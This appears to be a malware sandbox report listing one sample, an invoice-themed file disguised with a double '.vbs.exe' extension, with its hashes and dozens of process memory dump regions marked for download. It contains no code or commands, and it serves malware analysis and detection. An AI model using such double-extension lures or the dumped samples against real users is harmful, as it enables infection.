C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/2736-9634-0x0000000006830000-0x0000000006880000-memory.dmp

Filesize
320KB

Download
memory/2736-9633-0x0000000006080000-0x0000000006092000-memory.dmp

Filesize
72KB

Download
memory/2736-9632-0x0000000005BC0000-0x0000000005C52000-memory.dmp

Filesize
584KB

Download
memory/2736-4653-0x0000000005440000-0x0000000005530000-memory.dmp

Filesize
960KB

Download
memory/2736-4652-0x0000000005050000-0x000000000507C000-memory.dmp

Filesize
176KB

Download
memory/2736-1757-0x0000000004EF0000-0x0000000004F8C000-memory.dmp

Filesize
624KB

Download
memory/2736-1756-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/3464-717-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-707-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-665-0x0000000006260000-0x000000000627E000-memory.dmp

Filesize
120KB

Download
memory/3464-666-0x0000000006290000-0x00000000062DC000-memory.dmp

Filesize
304KB

Download
memory/3464-667-0x0000000007220000-0x00000000072B6000-memory.dmp

Filesize
600KB

Download
memory/3464-668-0x0000000006780000-0x000000000679A000-memory.dmp

Filesize
104KB

Download
memory/3464-669-0x00000000067D0000-0x00000000067F2000-memory.dmp

Filesize
136KB

Download
memory/3464-670-0x0000000007870000-0x0000000007E14000-memory.dmp

Filesize
5.6MB

Download
memory/3464-671-0x00000000084A0000-0x0000000008B1A000-memory.dmp

Filesize
6.5MB

Download
memory/3464-672-0x0000000007580000-0x00000000076EC000-memory.dmp

Filesize
1.4MB

Download
memory/3464-673-0x0000000008110000-0x000000000824E000-memory.dmp

Filesize
1.2MB

Download
memory/3464-674-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-679-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-719-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-663-0x00000000051A0000-0x00000000051B0000-memory.dmp

Filesize
64KB

Download
memory/3464-733-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-737-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-735-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-731-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-729-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-727-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-725-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-723-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-722-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-715-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-713-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-711-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-664-0x00000000060D0000-0x00000000061D2000-memory.dmp

Filesize
1.0MB

Download
memory/3464-705-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-703-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-709-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-701-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-699-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-697-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-695-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-693-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-689-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-687-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-685-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-683-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-677-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-675-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-691-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-681-0x0000000008110000-0x0000000008249000-memory.dmp

Filesize
1.2MB

Download
memory/3464-1748-0x0000000008250000-0x0000000008308000-memory.dmp

Filesize
736KB

Download
memory/3464-1749-0x0000000008310000-0x000000000835C000-memory.dmp

Filesize
304KB

Download
memory/3464-1754-0x0000000000AD0000-0x0000000000B24000-memory.dmp

Filesize
336KB

Download
memory/3464-662-0x0000000005B50000-0x0000000005EA4000-memory.dmp

Filesize
3.3MB

Download
memory/3464-652-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/3464-651-0x00000000051F0000-0x0000000005256000-memory.dmp

Filesize
408KB

Download
memory/3464-650-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

Filesize
136KB

Download
memory/3464-649-0x0000000004FF0000-0x0000000005072000-memory.dmp

Filesize
520KB

Download
memory/3464-648-0x0000000005280000-0x00000000058A8000-memory.dmp

Filesize
6.2MB

Download
memory/3464-647-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

Filesize
216KB

Download